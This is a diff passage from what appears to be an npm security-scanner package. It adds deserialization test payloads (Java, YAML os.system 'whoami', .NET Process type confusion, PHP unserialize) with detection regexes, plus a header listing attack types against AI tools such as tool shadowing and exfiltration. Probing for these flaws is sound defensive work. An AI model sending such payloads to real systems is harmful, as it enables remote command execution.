+ payload: "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==",
181
+ evidence: /deserializ|java\.io|objectinputstream|gadget|RCE/i,
182
+ riskLevel: "HIGH",
183
+ description: "Java serialized object payload",
184
+ payloadType: "injection",
185
+ parameterTypes: ["data", "input", "serialized", "object"],
186
+ },
187
+ {
188
+ payload: "!!python/object/apply:os.system ['whoami']",
189
+ evidence: /yaml.*load|deserializ|RCE|unsafe.*yaml|python.*object/i,
190
+ riskLevel: "HIGH",
191
+ description: "YAML deserialization exploit",
192
+ payloadType: "injection",
193
+ parameterTypes: ["data", "yaml", "config", "input"],
194
+ },
195
+ {
196
+ payload: '{"__type__": "System.Diagnostics.Process", "command": "whoami"}',
197
+ // Pattern must be specific - "process" alone matches "not processed" (false positive)
198
+ // Look for: type coercion, deserialization, System.Process instantiation, or RCE evidence
199
+ evidence: /type.*coercion|type.*instantiat|deserializ|System\..*Process|Process\.Start|RCE|unsafe.*type/i,
200
+ riskLevel: "HIGH",
201
+ description: "JSON type confusion payload",
202
+ payloadType: "injection",
203
+ parameterTypes: ["data", "json", "input", "payload"],
204
+ },
205
+ {
206
+ payload: "unserialize(base64_decode($_POST['data']))",
207
+ evidence: /unserializ|deserializ|RCE|php.*object|unsafe/i,
208
+ riskLevel: "HIGH",
209
+ description: "PHP unserialization pattern",
210
+ payloadType: "injection",
211
+ parameterTypes: ["data", "input", "payload"],
212
+ },
213
+ ],
214
+ },
215
+ ];
package/client/lib/lib/securityPatterns/toolSpecificPatterns.d.ts ADDED
@@ -0,0 +1,13 @@
1
+ /**
2
+ * Tool-Specific Vulnerability Patterns
3
+ *
4
+ * Patterns targeting specific tool behaviors and vulnerabilities.
5
+ * Includes: SSRF/Indirect Injection, Unicode Bypass, Nested Injection,
6
+ * Package Squatting, Data Exfiltration, Configuration Drift, Tool Shadowing
7
+ */
8
+ import { AttackPattern } from "./types.js";
9
+ /**
10
+ * Tool-specific vulnerability patterns (7 patterns)
11
+ */
12
+ export declare const TOOL_SPECIFIC_PATTERNS: AttackPattern[];
13
+ //# sourceMappingURL=toolSpecificPatterns.d.ts.map
package/client/lib/lib/securityPatterns/toolSpecificPatterns.d.ts.map ADDED
@@ -0,0 +1 @@
1
+ {"version":3,"file":"toolSpecificPatterns.d.ts","sourceRoot":"","sources":["../../../src/lib/securityPatterns/toolSpecificPatterns.ts"],"names":[],"mappings":"AAAA;;;;;;GAMG;AAEH,OAAO,EAAE,aAAa,EAAE,MAAM,SAAS,CAAC;AAExC;;GAEG;AACH,eAAO,MAAM,sBAAsB,EAAE,aAAa,EAkZjD,CAAC"}